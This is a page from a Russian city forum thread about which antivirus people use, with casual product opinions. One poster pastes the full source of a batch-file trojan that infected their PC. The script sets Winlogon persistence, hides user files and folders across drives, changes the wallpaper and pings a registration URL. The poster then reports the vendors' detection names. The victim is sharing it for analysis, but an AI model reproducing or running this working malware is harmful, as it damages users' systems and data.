Ярославль


Страницы: (13) « Первая ... 11 12 [13]   ( Перейти к первому непрочитанному сообщению ) Ответ в темуСоздание новой темыСоздание опроса

Каким антивирусом пользуетесь?

outsayder
Дата 28.06.2011 - 17:16
Цитировать сообщение




The IT Crowd
*******

Профиль
Группа: Пользователи
Сообщений: 15874
Пользователь №: 13051
Регистрация: 14.12.2006 - 15:26





Цитата
У меня неожиданно перестал работать LiveUpdate у SymantecAV. И вообще на symantec.com зайти не могу.

эт вирус у тебя, он блокирует сайты антивирусов....... скачай на работе утилиту Dr.Web CureIT и прогони, думаю найдешь его... rolleyes.gif

Это сообщение отредактировал outsayder - 29.06.2011 - 07:38
PMПисьмо на e-mail пользователю
Top
C_Nastya
Дата 28.06.2011 - 23:05
Цитировать сообщение




Unregistered












outsayder
Спасибо, все получилось )
Top
Мезузу
  Дата 27.01.2012 - 22:40
Цитировать сообщение




Козявка
*****

Профиль
Группа: Пользователи
Сообщений: 1543
Пользователь №: 40569
Регистрация: 10.08.2009 - 13:49





Схватил такую фигню в формате .bat
Появилось это
user posted image
Потом изчезли все папки на дисках.
Ни один антивирус не опознал. blink.gif
Если кто разбирается подскажите откуда он взялся, куда делся и когда снова ожидать.
Комп вылечил вручную.

@Echo off

set Data2=%TEMP%\Data2.exe
set Data3=%TEMP%\Data3
set TBTask=%SYSTEMROOT%\TBTask\TBTask.exe
set Service=%SYSTEMROOT%\TBTask\Service.dat
set Config=%SYSTEMROOT%\TBTask\Config.dat
set Remover=%SYSTEMROOT%\TBTask\Remover.bat
set Generated=%SYSTEMROOT%\Generated.bmp

find /i /c "Done" "%Config%"&& (del %Data3% >nul
>%Remover% echo @Echo off
>>%Remover% echo :dif1
>>%Remover% echo del %TEMP%\Data2.exe
>>%Remover% echo if exist %TEMP%\Data2.exe goto dif1
>>%Remover% echo exit
start %Remover% >nul
exit)
rem прерываем утановку, если троян уже однажды прожил свой цикл в системе

if exist %Data3% (MD %SYSTEMROOT%\TBTask >nul
attrib +h +s %SYSTEMROOT%\TBTask >nul
move %Data2% %TBTask% >nul
move %Data3% %Service% >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%SYSTEMROOT%\system32\userinit.exe,%SYSTEMROOT%\TBTask\TBTask.exe" /f >nul)
rem установка нашего трояна в систему

find /i /c "Ready2" "%Config%"|| goto dif2

attrib +h +s c:\*.txt /s >nul
attrib +h +s c:\*.!ut /s >nul
attrib +h +s c:\*.3gp /s >nul
attrib +h +s c:\*.aac /s >nul
attrib +h +s c:\*.ac3 /s >nul
attrib +h +s c:\*.avi /s >nul
attrib +h +s c:\*.chm /s >nul
attrib +h +s c:\*.cue /s >nul
attrib +h +s c:\*.djv /s >nul
attrib +h +s c:\*.djvu /s >nul
attrib +h +s c:\*.dmf /s >nul
attrib +h +s c:\*.doc /s >nul
attrib +h +s c:\*.docx /s >nul
attrib +h +s c:\*.dot /s >nul
attrib +h +s c:\*.flac /s >nul
attrib +h +s c:\*.flv /s >nul
attrib +h +s c:\*.gif /s >nul
attrib +h +s c:\*.jar /s >nul
attrib +h +s c:\*.htm /s >nul
attrib +h +s c:\*.html /s >nul
attrib +h +s c:\*.ifo /s >nul
attrib +h +s c:\*.iso /s >nul
attrib +h +s c:\*.jpeg /s >nul
attrib +h +s c:\*.jpg /s >nul
attrib +h +s c:\*.kar /s >nul
attrib +h +s c:\*.m3u /s >nul
attrib +h +s c:\*.m2v /s >nul
attrib +h +s c:\*.m4v /s >nul
attrib +h +s c:\*.mht /s >nul
attrib +h +s c:\*.mid /s >nul
attrib +h +s c:\*.midi /s >nul
attrib +h +s c:\*.mkv /s >nul
attrib +h +s c:\*.mov /s >nul
attrib +h +s c:\*.mp3 /s >nul
attrib +h +s c:\*.mp4 /s >nul
attrib +h +s c:\*.mpeg /s >nul
attrib +h +s c:\*.mpg /s >nul
attrib +h +s c:\*.ogg /s >nul
attrib +h +s c:\*.pdf /s >nul
attrib +h +s c:\*.plc /s >nul
attrib +h +s c:\*.pls /s >nul
attrib +h +s c:\*.png /s >nul
attrib +h +s c:\*.qt /s >nul
attrib +h +s c:\*.rar /s >nul
attrib +h +s c:\*.rtf /s >nul
attrib +h +s c:\*.key /s >nul
attrib +h +s c:\*.tif /s >nul
attrib +h +s c:\*.tiff /s >nul
attrib +h +s c:\*.torrent /s >nul
attrib +h +s c:\*.ts /s >nul
attrib +h +s c:\*.vob /s >nul
attrib +h +s c:\*.wav /s >nul
attrib +h +s c:\*.wma /s >nul
attrib +h +s c:\*.wmv /s >nul
attrib +h +s c:\*.zip /s >nul
attrib +h +s c:\*.eml /s >nul

set disk="d"
:dif6
if not exist "%disk%:\" goto dif5

attrib +h +s %disk%:\*.* /s /d >nul

:dif5
if %disk% == "d" (set disk="e"
goto dif6)
if %disk% == "e" (set disk="f"
goto dif6)
if %disk% == "f" (set disk="g"
goto dif6)
if %disk% == "g" (set disk="h"
goto dif6)
if %disk% == "h" (set disk="i"
goto dif6)
if %disk% == "i" (set disk="j"
goto dif6)
if %disk% == "j" (set disk="k"
goto dif6)
if %disk% == "k" (set disk="l"
goto dif6)
if %disk% == "l" (set disk="m"
goto dif6)
if %disk% == "m" (set disk="n"
goto dif6)
if %disk% == "n" (set disk="o"
goto dif6)
rem применение атрибутов к файлам и папкам

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "%SYSTEMROOT%\system32\userinit.exe," /f >nul
>%Config% echo Done

>%Remover% echo @Echo off
>>%Remover% echo :dif1
>>%Remover% echo del %SYSTEMROOT%\TBTask\TBTask.exe
>>%Remover% echo if exist %SYSTEMROOT%\TBTask\TBTask.exe goto dif1
>>%Remover% echo exit
start %Remover% >nul
exit

:dif2
rem удаление трояна


find /i /c "Ready1" "%Config%"|| goto dif3

move %Service% %Generated% >nul

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %SYSTEMROOT%\Generated.bmp /f >nul
reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d 0 /f >nul
reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d 2 /f >nul
:dif3
rem установка обоев рабочего стола

set ARG0=0

set /a ARG=ARG0 + 1
:dif4
find /i /c "l%ARG%" "%Config%"&& (set /a ARG=ARG + 1
goto dif4)
>>%Config% echo l%ARG%

if "%ARG%" == "19" >>%Config% echo Ready1
if "%ARG%" == "20" >>%Config% echo Ready2
rem счётчик запусков


find /i /c "Registered" "%Config%"&& exit

ping 1.1.1.1 -n 1 -w 20000 2>nul | find "ttl=" >nul
start /min iexplore.exe http://truth-restorer.narod.ru/register.html >nul
ping 1.1.1.1 -n 1 -w 5000 2>nul | find "ttl=" >nul
TASKKILL /IM iexplore.exe /T >nul
>>%Config% echo Registered
rem регистрация нового инсталла
PMПисьмо на e-mail пользователю
Top
Andfox
Дата 28.01.2012 - 00:00
Цитировать сообщение




Unregistered












Harvey
А я себе не так давно поставил Доктора Веба , благо в инетмагазине скидка была и дешёво обошёлся, и довольно таки не плохим показался антивирусом, в разы получше чем аваст или авира, стоящие до этого.
Ясен пень, бесплатные авира и аваст ваще не антивирусы, а чисто так, цветные иконки на панельке. laugh.gif
Top
Aylatan
Дата 30.01.2012 - 11:40
Цитировать сообщение




Unregistered












Kaspersky CRYSTAL - один из самых лучших(комплексная защита РС) biggrin.gif
Top
Мезузу
Дата 30.01.2012 - 11:54
Цитировать сообщение




Козявка
*****

Профиль
Группа: Пользователи
Сообщений: 1543
Пользователь №: 40569
Регистрация: 10.08.2009 - 13:49





biggrin.gif

Это сообщение отредактировал Мезузу - 9.02.2012 - 10:54
PMПисьмо на e-mail пользователю
Top
Мезузу
Дата 30.01.2012 - 11:56
Цитировать сообщение




Козявка
*****

Профиль
Группа: Пользователи
Сообщений: 1543
Пользователь №: 40569
Регистрация: 10.08.2009 - 13:49





mad.gif

Это сообщение отредактировал Мезузу - 9.02.2012 - 10:55
PMПисьмо на e-mail пользователю
Top
Мезузу
Дата 30.01.2012 - 23:52
Цитировать сообщение




Козявка
*****

Профиль
Группа: Пользователи
Сообщений: 1543
Пользователь №: 40569
Регистрация: 10.08.2009 - 13:49





Первым откликнулся Dr.Web в 15.32

Ваш запрос был проанализирован. Соответствующая запись добавлена в вирусную базу Dr.Web и будет доступна при следующем обновлении.

Угроза: Trojan.Siggen3.42913

Спасибо за сотрудничество.


После одумался НОД32 в 22.06

Присланный Вами вирус определяется с версией базы данных сигнатур вирусов №6839

Спасибо за помощь в борьбе с вирусами.


Здесь результаты он-лайн сканирования
http://r.virscan.org/report/49112dde78bb7d...ae711f1e87.html
http://r.virscan.org/report/a6f924906ec474...9dde06c526.html

Это сообщение отредактировал Мезузу - 31.01.2012 - 00:12
PMПисьмо на e-mail пользователю
Top
Joy
Дата 31.01.2012 - 12:56
Цитировать сообщение




Unregistered












на работе SEP дома MS ES
Top
shuric__k
Дата 8.02.2012 - 04:06
Цитировать сообщение




Unregistered












ДрВеб рулит
Top
~Vladislav~
Дата 8.02.2012 - 08:51
Цитировать сообщение




Unregistered












не так давно перешел на антивир от компании symantec, вообще классная штука.
Top

Опции темы Страницы: (13) « Первая ... 11 12 [13]  Ответ в темуСоздание новой темыСоздание опроса

 



[ Время генерации скрипта: 0.0125 ]   [ Использовано запросов: 15 ]   [ GZIP включён ]



Яндекс.Метрика

Правила Ярпортала (включая политику обработки персональных данных)

Все вопросы: yaroslavl@bk.ru